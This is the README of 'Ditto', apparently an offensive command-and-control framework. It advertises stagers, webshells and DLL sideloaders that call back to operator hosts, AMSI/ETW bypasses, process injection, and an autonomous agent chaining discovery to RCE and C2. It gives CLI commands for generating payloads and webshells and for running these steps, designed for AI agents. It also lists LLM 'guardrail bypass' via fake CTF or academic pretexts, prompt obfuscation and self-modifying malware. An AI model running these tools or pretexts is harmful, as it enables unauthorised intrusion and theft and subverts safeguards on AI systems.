Ditto 🎭

Advanced Security Testing Framework

A production-ready red team framework with advanced evasion techniques, C2 capabilities, comprehensive module support, and full AI agent compatibility

---

Features

Core Capabilities

• WebUI: Modern web-based interface with real-time updates, comprehensive dashboard, and full feature parity with CLI. Built with Next.js/React frontend and Go/Gin backend, featuring JWT authentication, operation scoping, SSE event streaming, and embedded single-binary deployment
• C2 Server: Multi-protocol command and control server (HTTP, HTTPS, mTLS) with auto-start on demand and persistent state management
• Vectorese Protocol: Novel AI model vector space-centric C2 communication language with 20,000+ concept vectors, steganographic embedding, and emergent protocol evolution. Automatically enabled across all implants and servers with graceful legacy fallback.
• Payload Generation: Stager, shellcode, full payloads, and DLL payloads (proxy, dropper, stager) with cross-platform support. All payload types (stager, full) compile to native executables for Windows (PE), Linux (ELF), and macOS (Mach-O) using Go cross-compilation. Automatic dependency resolution and native binary generation for all platforms.
• Module System: 419+ Empire-compatible modules across 12 categories (Code Execution, Collection, Credentials, Discovery, Exfiltration, Exploitation, Lateral Movement, Persistence, Privilege Escalation, Reconnaissance, Command & Control, Defense Evasion)
• Loot Management: Encrypted credential, file, token, hash, and AD data storage with SQLite backend
• Session Management: Full session lifecycle with command execution, file transfer, and real-time synchronization
• Active Directory: Automated enumeration, exploitation, and attack path discovery with BloodHound integration
• Persistence & Pivoting: Port forwarding, SOCKS5 proxies, and persistence mechanisms
• SOCKS5 Tunneling: Production-grade SOCKS5 server with tunnel multiplexing over agent beacon channels (WebSocket and HTTP2), enabling stealthy network pivoting and autonomous scanning through remote networks. Supports bidirectional streaming via HTTP2 streams for improved firewall compatibility.
• Event-Driven Scanning: Dynamic reactive scanner with real-time discovery, continuous template matching, and immediate execution. Features Nmap integration, discovery correlation, verification engine, false positive filtering, and adaptive rate limiting
• Automated Scanning: Comprehensive web vulnerability scanner with template-based scanning, signature matching, reconnaissance, specialist tools, and RCE exploitation
• Autonomous Agent: Fully automated red team agent that discovers targets, scans for vulnerabilities, chains exploits, achieves RCE, and integrates with C2 listeners for post-exploitation
• BEEF Integration: Complete browser exploitation framework with 100+ modules for browser manipulation, host reconnaissance, network scanning, and social engineering
• Amass Integration: Comprehensive asset discovery engine with 20+ API plugins for subdomain enumeration, DNS reconnaissance, and asset correlation
• Masscan Integration: High-speed port scanning capabilities with banner grabbing, service detection, and vulnerability checking
• Donut Integration: Advanced payload generation from PE/CLR/Script files with AMSI/ETW/WLDP bypasses and polymorphic loaders
• Web Terminal: Full interactive terminal with XTerm.js, WebSocket-based bidirectional communication, command routing (shell, file, module operations), stream lifecycle management with idle timeouts, and session resumption with metadata persistence
• Automatic Metadata Collection: Implants automatically collect system information (hostname, username, OS, architecture, domain) at startup and transmit via OPSEC-safe base64-encoded headers, with auto-population of WebUI on first beacon and database upsert pattern for immediate metadata storage
• Payload Diversity System: Polymorphic payload generation using Lito (LLVM bitcode manipulation), Morpher (AST-based code transformation with dead code insertion, relocation, expansion), and Wig (semantic-aware code generation using vector embeddings), with interactive CLI, state management, and metrics tracking
• Enhanced Transport Layer: HTTP/2 WebSocket native support, stream relay with multi-client attachment, adaptive beaconing (fast polling when tasks pending), command output interception for metadata extraction, and stream reuse to prevent session context resets

AI Agent Features

• Structured JSON Output: All commands support --json flag for machine-readable output
• Standardized Exit Codes: Consistent exit codes (0=success, 1=error, 2=invalid input, 3=not found, etc.)
• Actionable Errors: Error codes, human messages, AI-actionable suggestions, and recovery commands
• Decision Trees: Workflow guidance embedded in command outputs
• Complete Feature Parity: All interactive mode features available via CLI

AI-Enhanced LLM Capabilities

• Multi-Provider LLM Support: OpenAI, Anthropic, Hugging Face, LM Studio (OpenAI-compatible), and MCP servers with automatic fallback chain
• Prompt Obfuscation: Advanced obfuscation strategies (encoding, splitting, semantic, steganography, hybrid) to evade detection
• Runtime Code Generation: PromptLock-style dynamic script generation (Lua, PowerShell, Python, Bash) at runtime
• MalMorph-Style Variants: Function-level code transformations with AST-based reconstruction and compilation pipeline
• PROMPTFLUX-Style Self-Modification: Hourly code regeneration with recursive mutation and machine-parsable prompts
• API Key Evasion: Encrypted storage, format masking, noise injection, and automatic key rotation
• MCP Integration: Local and remote Model Context Protocol servers with HTTP/WebSocket transport
• Context Management: CLAUDE.md-style persistent operational context with TTPs and attack methodologies
• Guardrail Bypass: Social engineering pretexts (CTF, academic, security testing) with multi-language support
• AI Endpoint Evasion: Domain fronting (CloudFront, Azure, GCP), TLS fingerprint randomization, traffic mixing
• Behavioral Evasion: Process manipulation (hollowing, spoofing, DLL/thread injection) with Windows API bindings
• Adaptive Strategies: Dynamic obfuscation selection based on detection rates and provider capabilities

Advanced AD Automation

• Interactive Event-Driven Communication: SSE/long-polling for real-time bidirectional communication
• Native Go AD Modules: LDAP queries, session enumeration, ACL analysis, trust enumeration, SPN enumeration, delegation checks
• Automated Pentesting Engine: Multiple modes (enum, exploit, auto, shell) with configurable automation levels
• Intelligence Collection: Server-side event processing, automatic analysis, and finding identification
• BloodHound Integration: Neo4j graph database queries for attack path discovery and prioritization
• Attack Path Analysis: Automated path ranking by stealth score and success probability
• Data Gap Analysis: Intelligent suggestion engine identifies missing enumeration data
• AD Navigator CLI: Interactive AD exploration with real-time querying
• Task Chaining: Automated execution of attack steps via native Go modules
• Stealth Indicators: Configurable stealth levels with detection risk ratings

DLL Sideloading

• Proxy DLL, Dropper & Stager: Multiple payload types with export forwarding, installer mimicry, and C2 beacon integration
• Multiple Techniques: Office 365, Spotify hijacking, KnownDLLs bypass, AppInit DLLs, registry-based sideloading
• Advanced Evasion: PE obfuscation, multi-layer encryption, delayed execution, anti-sandbox checks, code signing
• C2 Integration: Full beacon implementation with malleable profiles, task execution, and server-side debug logging

Event-Driven Scanning Infrastructure

• Reactive Discovery: Real-time port/service/technology discovery using Nmap (primary) and internal scanners (refinement) with incremental event streaming
• Continuous Template Matching: Background template matching engine that matches templates as discoveries occur, with context-aware scoring and priority queuing
• Immediate Execution: Matched templates execute immediately with adaptive rate limiting, priority queuing, and target health monitoring
• Nmap Integration: Primary scanner with top1000 ports default (full 1-65535 available), stealth mode, service detection, script output parsing, and CVE extraction
• Discovery Correlation: Multi-source discovery correlation engine that merges and validates findings from Nmap, banners, HTTP headers, and content analysis
• Verification Engine: Multi-stage vulnerability verification with HTML reflection analysis, payload encoding detection, and baseline deviation analysis
• False Positive Filtering: Advanced filtering with response analysis, execution proof detection, and static HTML reflection filtering
• Confidence Scoring: Dynamic confidence adjustment based on evidence quality, verification results, and historical data
• Adaptive Execution: Dynamic rate limiting, priority queuing based on severity/score, and target health monitoring with circuit breakers
• Structured Logging: JSON-formatted event logging for discovery, matching, and execution events with trace IDs
• Metrics Collection: Prometheus-compatible metrics for discovery events, template matches, queue depth, execution times, and target health
• Error Recovery: Retry logic with exponential backoff, circuit breaker pattern, and graceful error handling
• Performance Optimizations: Discovery result caching, concurrent processing, and intelligent resource management

Automated Scanning Infrastructure

• Template Scanning: Nuclei-like YAML template engine for vulnerability detection with matchers, extractors, and variables
• Signature Matching: Fast parallel signature execution for quick vulnerability identification
• Reconnaissance Tools: HTTP probing, web crawling, and path discovery with configurable depth and concurrency
• Specialist Scanners: XSS detection, SQL injection testing, fuzzing, and parameter discovery
• Workflow Engine: DAG-based task orchestration for complex multi-step scanning operations
• RCE Exploitation: Automatic RCE detection, OS fingerprinting via benign callbacks, listener-aware payload generation, and automated exploitation
• AI Agent Friendly: Standardized JSON output with consistent error codes, suggestions, and trace IDs
• CLI & Interactive Modes: Full feature parity between command-line and interactive shell interfaces
• Report Formats: Export findings in SARIF, JSONL, CSV, and HTML formats
• Integration: Automatic findings storage in loot system with policy management and rate limiting
• Malleable C2 Profiles: Automatic caching and intelligent selection of BC-SECURITY profiles based on detected webapp/OS/tech stack, with full transform support for evasion
• Web Shell Generation: Automatic PHP/ASPX/JSP webshell generation with Ditto C2 beacon protocol, malleable transforms, and intelligent tech stack detection
• Advanced Web Shell Techniques: 7 advanced evasion techniques including GraphQL-based, WebSocket-based, database-backed, OPcache, framework-specific, cloud-native, and multi-protocol webshells
• Web Shell Repository Integration: Automatic caching and selection from 3 active repositories (JohnTroony/php-webshells, tennc/webshell, BlackArch/webshells) based on detected technology stack
• Large Payload Handling: Automatic payload splitting, base64 encoding, and file write optimization for command injection constraints

Autonomous Red Team Agent

• Full Automation Pipeline: Target discovery → vulnerability scanning → exploit chain building → RCE execution → C2 integration
• Intelligent Target Discovery: OSINT gathering, subdomain enumeration, certificate transparency logs, GitHub reconnaissance
• Automated Vulnerability Scanning: Technology detection, template matching, and vulnerability discovery with RCE detection
• Exploit Chain Building: Multi-step exploitation chains automatically constructed from discovered vulnerabilities
• RCE → C2 Integration: Automatic payload generation, RCE exploitation, and C2 callback establishment with active listener detection
• Learning Engine: Pattern recognition and adaptive exploitation strategies based on successful attacks
• Findings Management: Comprehensive findings tracking with exploit chains, impact assessment, and evidence collection
• CLI Commands: autonomous start, autonomous status, autonomous targets, autonomous chains, autonomous findings, autonomous config, autonomous learn

BEEF (Browser Exploitation Framework)

• Complete Browser Exploitation: Full-featured browser exploitation framework integrated into Ditto
• 100+ Modules: Comprehensive module library across browser, host, network, exploit, persistence, and social engineering categories
• WebSocket C2: Real-time command and control via WebSocket connections
• JavaScript Hook Generation: Automatic hook code generation for target websites
• Browser Management: Track and manage hooked browsers with detailed browser information
• Module Categories: Browser manipulation, host reconnaissance, network scanning, exploitation, persistence, social engineering, Chrome extensions, IPEC (Internal Network Exploitation), Metasploit integration
• Admin UI: Web-based interface for browser management and module execution
• JSON Output: All commands support --json flag for AI agent compatibility

Amass (Asset Discovery)

• Comprehensive Asset Discovery: Advanced subdomain enumeration and asset discovery engine
• 20+ API Plugins: Integration with VirusTotal, SecurityTrails, PassiveTotal, BinaryEdge, Hunter.io, LeakIX, and more
• DNS Enumeration: Multiple DNS enumeration techniques including reverse DNS, CNAME, TXT records
• Asset Enrichment: Automatic enrichment with contact information, email addresses, and organization data
• Database Storage: SQLite-based storage for discovered assets with query capabilities
• Visualization Support: Generate graph data for visualization tools
• Passive & Active Modes: Configurable passive (OSINT) and active (DNS brute force) enumeration
• JSON Output: All commands support --json flag for structured output

Masscan (High-Speed Port Scanning)

• Ultra-Fast Scanning: Scan millions of ports per second with optimized packet handling
• Banner Grabbing: Automatic banner grabbing on discovered open ports
• Service Detection: Identify services running on open ports
• Vulnerability Checking: Built-in vulnerability checking capabilities
• Firewall Management: Automatic firewall rule management for optimal scanning
• Custom Port Ranges: Flexible port specification (ranges, lists, common ports)
• Rate Control: Configurable scan rate for stealth and performance
• JSON Output: All commands support --json flag for structured output

Donut (Payload Generation)

• Advanced Payload Generation: Generate shellcode from PE executables, .NET assemblies, and scripts
• AMSI Bypass: Automatic AMSI (Antimalware Scan Interface) bypass for .NET payloads
• ETW Bypass: Event Tracing for Windows bypass capabilities
• WLDP Bypass: Windows Lockdown Policy bypass support
• Polymorphic Loaders: Multiple loader types with polymorphic capabilities
• Multiple Architectures: Support for x86, x64, and ARM architectures
• CLR Support: Full .NET Common Language Runtime support
• Script Support: Generate payloads from VBScript, JScript, and PowerShell scripts
• JSON Output: All commands support --json flag for structured output

Enhanced Scanning with Iterative Discovery

• Iterative Scanning Workflow: Discovered subdomains automatically scanned recursively
• Artifact Processing: Discovered IPs, ports, and hosts feed into subsequent scan phases
• Full Reconnaissance Pipeline: Integrated workflow: Amass (asset discovery) → Masscan (port scanning) → Templates (vulnerability scanning)
• JSON Output: Complete JSON output for scan <target> --json and scan full <target> --json commands

Evasion Techniques

• Direct Syscall Unhooking: Runtime syscall detection, bypasses userland hooks
• ETW/AMSI Patching: Blinds Windows telemetry and script scanning
• PE Unhooking: Complete DLL refresh from disk to remove hooks
• Process Injection: Multiple methods with direct syscalls (CreateRemoteThread, NtCreateThreadEx, QueueUserAPC)
• Privilege Escalation: Automated SYSTEM elevation with intelligence gathering (GetSystem, GetSystemSafe)

---

Quick Start

Installation

# Clone repository
git clone https://github.com/rxid09672/ditto.git
cd ditto

# Build (offline mode - uses cached modules)
make build

# Build for online mode (fetches modules from GitHub)
make build-online

# Cross-compile for Windows
make build-windows

WebUI Access

# Start Ditto server (WebUI automatically integrated)
./bin/ditto --mode server start

# WebUI is available at:
# - Frontend: http://localhost:8443/ or http://localhost:8443/webui/
# - API: http://localhost:8443/api/v1/
# - Default credentials: admin/admin (change on first login)

Interactive Mode

# Start interactive CLI (server auto-starts on 127.0.0.1:8443, WebUI integrated)
./bin/ditto

# Generate payload
[ditto] > generate stager windows amd64 payload.exe

# Server is already running - start listeners
[ditto] > listen http 0.0.0.0:8080

# Use session
[ditto] > use <session_id>

# Scan with event-driven reactive scanner (automatic discovery + template execution)
[ditto] > scan https://target.com

# Full reconnaissance scan (Amass → Masscan → Templates) with JSON output
[ditto] > scan full example.com --json

# Scan with specific template
[ditto] > scan template ditto-scanner/test/fixtures/templates/xss-test.yaml https://target.com

# Scan and exploit RCE vulnerabilities
[ditto] > scan rce-exploit https://target.com

# BEEF browser exploitation
[ditto] > beef start
[ditto] > beef hook http://target.com
[ditto] > beef zombies
[ditto] > beef exec browser/fingerprint

# Amass asset discovery
[ditto] > amass enum example.com --json
[ditto] > amass subdomains example.com --json
[ditto] > amass assets example.com --json

# Masscan port scanning
[ditto] > masscan scan 192.168.1.0/24 --ports 80,443,8080 --json
[ditto] > masscan ports example.com --json

# Donut payload generation
[ditto] > donut generate /path/to/binary.exe --json
[ditto] > donut list --json

# Generate webshells (standard and advanced techniques)
[ditto] > webshell generate --type php --callback http://10.0.0.1:8443 --output shell.php
[ditto] > webshell generate --advanced graphql --callback http://10.0.0.1:8443
[ditto] > webshell list --language php
[ditto] > webshell cache refresh

# Direct template scan (CLI mode)
./bin/ditto --mode scan scan --template <template.yaml> --target <url>

# Autonomous agent (full automation: discovery → RCE → C2)
[ditto] > autonomous start --domains target.com
[ditto] > autonomous status
[ditto] > autonomous findings list

# AD automation examples
[ditto] > ad-auto enum --level safe --stealth
[ditto] > ad-auto exploit --target DOMAIN_ADMINS --level semi
[ditto] > ad-auto auto --level auto
[ditto] > ad-auto shell

# LLM-enhanced payload generation
[ditto] > generate full windows amd64 --callback http://192.168.1.100:8443 --llm-enabled --llm-polymorphic
[ditto] > llm status
[ditto] > llm test-obfuscation --strategy hybrid --prompt "test prompt"
[ditto] > llm api-key store --provider openai --key-id my-key --api-key <key>
[ditto] > llm generate-script --language powershell --purpose "list processes" --env-os windows

# Browse loot
[ditto] > loot browse

Command Line Mode

# Generate payload (Windows - native PE executable)
./bin/ditto --mode generate --payload stager --os windows --arch amd64 --output payload.exe --callback http://127.0.0.1:8080

# Generate payload (Linux - native ELF executable)
./bin/ditto --mode generate --payload full --os linux --arch amd64 --output agent --callback http://127.0.0.1:8080

# Generate payload (macOS - native Mach-O executable)
./bin/ditto --mode generate --payload full --os darwin --arch amd64 --output agent --callback http://127.0.0.1:8080

# Start listener (server auto-starts if needed)
./bin/ditto --mode listen start http 0.0.0.0:8080

# List listeners (shows active/inactive status)
./bin/ditto --mode listeners list

# List modules (JSON output for AI agents)
./bin/ditto --json --mode modules list

# Add loot
./bin/ditto --mode loot add credential admin_pass "password123"

# Direct template scan
./bin/ditto --mode scan scan --template ditto-scanner/test/fixtures/templates/xss-test.yaml --target https://target.com

# Autonomous agent (full automation: event-driven discovery + reactive scanning)
./bin/ditto --json autonomous start --domains target.com
./bin/ditto --json autonomous status
./bin/ditto --json autonomous findings list

# Web shell generation (JSON output for AI agents)
./bin/ditto --json --mode webshell generate --type php --callback http://10.0.0.1:8443 --output shell.php
./bin/ditto --json --mode webshell generate --advanced graphql --callback http://10.0.0.1:8443
./bin/ditto --json --mode webshell list --language php
./bin/ditto --json --mode webshell cache status

AI Agent Usage

# All commands support --json flag for structured output
# Server auto-starts when needed (no explicit start required)
./bin/ditto --json --mode listen start http 0.0.0.0:8080
./bin/ditto --json --mode listeners list  # Shows active/inactive status
./bin/ditto --json --mode modules list credentials
./bin/ditto --json --mode loot list --limit 10 --offset 0

See AGENTS.MD for complete command reference for AI agents.

---

AD Automation Usage

Enumeration Mode

Collect maximum AD intelligence without exploitation:

[ditto] > ad-auto enum --level safe --stealth

• Stealth: Low (0.1-0.3)
• Enumerates users, groups, computers, sessions, ACLs, trusts, SPNs
• Stores all artifacts in loot database

Exploit Mode

Execute specific attack path to target:

[ditto] > ad-auto exploit --target DOMAIN_ADMINS --level semi

• Stealth: Medium to High (0.4-0.8)
• Finds attack paths using BloodHound
• Executes best path with user prompts for high-risk steps

Auto Mode

Fully automated path to Domain Admin (like getsystem):

[ditto] > ad-auto auto --target DOMAIN_ADMINS --level auto

• Stealth: High to Critical (0.6-1.0)
• Full enumeration → Path analysis → Automated execution
• Tries multiple paths until success

Shell Mode

Interactive AD navigator:

[ditto] > ad-auto shell
[ditto] > ad help
[ditto] > ad list users
[ditto] > ad query ldap "(objectClass=user)"

Options

• --target <group/user> - Target group or user (default: DOMAIN_ADMINS)
• --level <auto|semi|safe> - Automation level (default: semi)
• --domain <domain> - Target domain (default: detected)
• --stealth - Show stealthiness ratings for each step
• --dry-run - Show plan without executing

---

Architecture

ditto/
├── core/                # Core functionality (config, logger, session)
├── evasion/             # Evasion techniques (syscalls, ETW, AMSI, etc.)
├── injection/           # Process injection
├── privilege/           # Privilege escalation (GetSystem, GetSystemSafe)
├── transport/           # C2 transports (HTTP, HTTPS, mTLS, interactive)
├── payload/             # Payload generation
├── loot/                # Loot management (SQLite, encryption, tagging)
├── modules/             # Module system (400+ Empire modules)
│   └── ad_automation/   # AD automation module
│       ├── automation/  # Auto executor (enum/exploit/auto/shell modes)
│       ├── go_modules/  # Native Go AD modules
│       ├── intelligence/ # Data collector, analyzer, suggestion engine
│       ├── bloodhound/  # Neo4j client for attack paths
│       └── pathfinder/  # Attack path analysis and ranking
├── interactive/          # Interactive CLI (AD navigator)
├── database/            # SQLite persistence
├── cmd/                 # Server lifecycle management
├── webui/               # WebUI implementation
│   ├── backend/         # Go/Gin API server with JWT auth, SSE, RBAC
│   │   ├── api/         # REST API handlers (callbacks, tasks, loot, etc.)
│   │   ├── auth/        # JWT, RBAC, middleware
│   │   └── sse/         # Server-Sent Events for real-time updates
│   └── frontend/        # Next.js/React frontend (TypeScript, Material-UI)
└── internal/            # Internal packages (errors, output, exitcodes)

---

Advanced Features

WebUI Features

• Modern Dashboard: Real-time statistics, system health metrics, event feed, and quick start guides
• Session Management: Interactive shell, file browser, task history, and loot display for each callback
• Payload Generation: Visual wizard for creating stagers, full payloads, and DLL payloads with all options
• Listener Management: Create, start, stop, and monitor HTTP/HTTPS/mTLS listeners
• Module Browser: Browse and execute 400+ Empire-compatible modules with parameter configuration
• Loot Management: Encrypted credential storage, credential testing, tagging, and export capabilities
• File Management: Upload, download, encrypt, decrypt, and share files with operation scoping
• Task Execution: Queue and monitor tasks with real-time output streaming
• Reporting: Generate PDF, HTML, Markdown, and JSON reports with scheduling
• Real-time Updates: Server-Sent Events (SSE) for live updates on callbacks, tasks, and events
• Operation Scoping: Multi-operation support with role-based access control (admin/operator)
• Security: JWT authentication, refresh tokens, API tokens, password history, and audit logging
• Integrations: BEEF, Amass, Masscan, Donut, LLM, AD automation, and scanning interfaces

Privilege Escalation

[ditto] > getsystem
[ditto] > getsystem-safe

• GetSystem: Automated escalation with AccessChk discovery and named pipe enumeration
• GetSystemSafe: LOLBin-only escalation with optional intelligence gathering

Process Injection

• Direct syscall injection (unhooked)
• Multiple methods: CreateRemoteThread, NtCreateThreadEx, QueueUserAPC
• Process migration with shellcode extraction

Module System

• 419+ Empire modules (PowerShell, Python, C#, BOF)
• Dynamic loading from GitHub or cached locally
• Online/offline modes with automatic refresh
• 12 categories: Code Execution, Collection, Credentials, Discovery, Exfiltration, Exploitation, Lateral Movement, Persistence, Privilege Escalation, Reconnaissance, Command & Control, Defense Evasion

Payload Types

• Stager: Minimal initial loader for staged deployment. Compiles to native executable (PE for Windows, ELF for Linux, Mach-O for macOS).
• Shellcode: Raw shellcode generation (Windows/Linux/Darwin)
• Full: Complete payload with all capabilities embedded. Compiles to native executable with full C2 beacon, tunnel support, and module execution.
• DLL Proxy: Proxy DLL with export forwarding (version.dll, wkscli.dll, etc.)
• DLL Dropper: Sideloading DLL with persistence options
• DLL Stager: DLL-based stager for staged deployment

Cross-Platform Compilation: Stager and Full payloads automatically compile using Go's cross-compilation with proper GOOS and GOARCH settings, ensuring native executables for each target platform.

DLL Sideloading Usage

# Proxy DLL with delayed execution
./bin/ditto generate dll-proxy windows amd64 --dll-target version.dll --dll-delay 30 --callback http://C2:8443

# Dropper with installer branding  
./bin/ditto generate dll-dropper windows amd64 --dll-target payload.dll --dll-technique spotify --installer-app-name "Update Client"

# Stager DLL
./bin/ditto generate dll-stager windows amd64 --dll-target stager.dll --callback http://C2:8443

---

Requirements

• Go: 1.24 or later
• Platform: Windows, Linux, or macOS
• Permissions: Administrator/root for some features
• Network Access (Online Mode): For fetching modules from GitHub
• BloodHound (Optional): Neo4j database for attack path analysis
• WPScan (Optional): For WordPress vulnerability scanning

WPScan Installation (Optional)

WPScan is required for WordPress vulnerability scanning. It will be automatically skipped if not installed.

Debian/Ubuntu:

sudo apt-get update
sudo apt-get install -y ruby-dev build-essential
gem install wpscan

macOS:

brew install wpscanteam/tap/wpscan

Check if installed:

make check-wpscan

Auto-install (if sudo available):

make install-deps

Check all dependencies:

make check-deps

BloodHound Setup (Optional)

export BLOODHOUND_URI="bolt://localhost:7687"
export BLOODHOUND_USER="neo4j"
export BLOODHOUND_PASS="your_password"
export BLOODHOUND_DB="neo4j"

---

Security

• All payloads encrypted by default (AES-256, ChaCha20)
• Code obfuscation available
• Secure communication via TLS/mTLS
• Authorization checks built-in
• Loot encrypted at rest with deterministic keys

---

Output Formats

Human-Readable (Default)

./bin/ditto --mode modules list

JSON (AI Agent Mode)

./bin/ditto --json --mode modules list

All commands support the --json flag for structured JSON output with:

• Standardized response format
• Error codes and actionable suggestions
• Decision trees for workflow guidance
• Next actions for recovery steps

---

Error Handling

All errors include:

• Error Code: Standardized error identifier (ERR_INVALID_INPUT, ERR_NOT_FOUND, etc.)
• Human Message: Readable error description
• Suggestions: AI-actionable guidance
• Next Actions: Recovery commands with examples

---

Documentation

• AGENTS.MD - Complete AI agent command reference

---

Development

Building

# Development build
make build

# Online mode (fetches modules from GitHub)
make build-online

# Offline mode (cached modules only)
make build-offline

# Cross-compilation
make build-windows
make build-linux
make build-darwin

Testing

make test

---

Known Limitations

This section documents known limitations, placeholders, and incomplete features in the Ditto framework. These are areas that may require additional configuration, external tools, or future enhancements.

Payload Generation

• Process Migration: Process migration functionality is implemented but may require additional testing in production environments. Uses process hollowing infrastructure for migration into target processes.
• PDB Parser: PDB (Program Database) file parsing requires external tools (pdbdump.exe or dumpbin.exe). The parser will attempt to locate these tools automatically, but they must be installed separately (Windows SDK or Visual Studio). Type information extraction from PDB files is optional and will gracefully degrade if tools are unavailable.

DLL Features

• DLL Installer Extraction: Installer file extraction supports MSI, NSIS, and ZIP formats via external tools (7-Zip, lessmsi). These tools must be installed separately. Extraction will fall back to placeholder files if tools are unavailable.
• Direct Syscall DLL Loading: Fully implemented for Windows using NtCreateFile, NtCreateSection, and NtMapViewOfSection. Requires Windows build tags and appropriate permissions.

Evasion Techniques

• DLL Unhooking: Fully implemented using RefreshPE() function. Unhooks critical DLLs (ntdll.dll, kernel32.dll, kernelbase.dll) by reloading clean copies from disk.
• EXIF Embedding: EXIF metadata embedding is implemented for JPEG and PNG formats using goexif library. Full image re-encoding may be required for some edge cases.

LLM Features

• Semantic Obfuscation: Enhanced with LLM paraphrasing support. Falls back to synonym replacement if LLM is unavailable. Requires LLM client to be configured via SetLLMParaphraser().
• Domain Fronting: CloudFront, Azure, and GCP domain fronting require configuration. Default placeholder domains are used if configuration is not provided. Configure via:
  • Environment variables: CLOUDFRONT_FRONTING_DOMAINS, AZURE_FRONTING_DOMAINS, GCP_FRONTING_DOMAINS
  • Configuration file: ~/.ditto/fronting_config.json
  • See payload/llm/fronting_config.go for details

Active Directory Automation

• UAC Flag Parsing: Fully implemented UAC flag parser with support for all standard flags including DONT_REQUIRE_PREAUTH. Located in modules/ad_automation/intelligence/uac_parser.go.
• Session Enumeration: Enhanced with WMI enumeration support for Windows. Requires appropriate credentials and network access to target computers. Falls back to LDAP-only enumeration if WMI is unavailable.
• User Detection: Enhanced with multiple detection methods and fallback chain:
  1. Session metadata (highest priority)
  2. Platform.GetUsername() (cross-platform)
  3. os/user.Current() (standard library)
  4. Environment variables (USERNAME/USER)
  5. LOGNAME (Unix/Linux)
  6. Placeholder fallback if all methods fail

Scanning Infrastructure

• XPath/CSS Extractors: Fully implemented using xmlquery (XPath) and goquery (CSS selectors) libraries. Supports XML and HTML parsing with attribute extraction.
• Threat Intelligence: Implemented with VirusTotal and AbuseIPDB API clients. Requires API keys:
  • VirusTotal: Set VIRUSTOTAL_API_KEY environment variable
  • AbuseIPDB: Set ABUSEIPDB_API_KEY environment variable
  • See ditto-scanner/pkg/autonomous/threatintel/ for implementation details

Vectorese Protocol

• K-means Clustering: Fully implemented k-means clustering algorithm for concept vector clustering in vectorese/dictionary.go. Uses cosine similarity for distance calculations.
• JSON Transport: Implemented JSON encoding/decoding for Vectorese vectors. Vectors can be embedded in JSON payloads or transmitted as standalone JSON arrays. See transport/vectorese_http.go for details.

General Notes

• Cross-Platform Support: Most features are cross-platform, but some Windows-specific features (DLL unhooking, direct syscalls, WMI) require Windows build tags and will gracefully degrade on other platforms.
• External Dependencies: Some features require external tools (PDB parsing, installer extraction). The framework will attempt to locate these tools automatically but may require manual installation.
• Configuration: Many features support both environment variables and configuration files. Check individual feature documentation for configuration options.

Future Enhancements

The following areas are identified for future enhancement:

• Enhanced PDB parsing with native Go implementation (currently requires external tools)
• Full installer archive support (InnoSetup, custom formats)
• Additional threat intelligence sources
• Enhanced steganography techniques
• Advanced process migration techniques

---

License

MIT License - see the LICENSE file for details.

---

Contributing

Contributions are welcome! Please follow standard contribution guidelines when submitting a Pull Request.

Getting Started

1. Fork the repository
2. Create a feature branch (git checkout -b feature/amazing-feature)
3. Commit your changes (git commit -m 'Add some amazing feature')
4. Push to the branch (git push origin feature/amazing-feature)
5. Open a Pull Request

Code Style

• Follow Go standard formatting (gofmt)
• Add tests for new features
• Update documentation as needed
• Ensure all tests pass before submitting

---

Acknowledgments

• Inspired by Sliver C2 framework
• Module system based on Empire
• Evasion techniques from various security research

---

Made with ❤️ for authorized security testing

⚠️ USE RESPONSIBLY ⚠️